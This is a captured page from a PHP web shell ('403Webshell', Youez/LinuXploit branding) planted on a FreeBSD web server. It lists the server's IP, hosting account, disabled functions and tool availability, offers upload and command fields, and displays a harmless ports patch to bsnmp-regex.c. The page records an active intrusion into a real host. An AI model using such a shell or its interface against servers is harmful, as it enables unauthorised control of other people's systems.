403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/net-mgmt/bsnmp-regex/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/net-mgmt/bsnmp-regex/files/patch-bsnmp-regex.c
--- module/bsnmp-regex.c.orig	2011-10-21 16:05:37.000000000 +0700
+++ module/bsnmp-regex.c	2018-06-05 21:16:44.471250000 +0700
@@ -788,7 +788,7 @@ config_var (char *name, char *value, int
     if (strcmp (name, "expire") == 0 || strcmp (name, "expires") == 0) {
 
         i = strtol (value, &t2, 10);
-        if (i <= 0 || *t2)
+        if (i < 0 || *t2)
             emsg ("invalid value for '%s' variable. ignoring: %s", name, value);
         else
             option_expires = i * 100;

Youez - 2016 - github.com/yon3zu
LinuXploit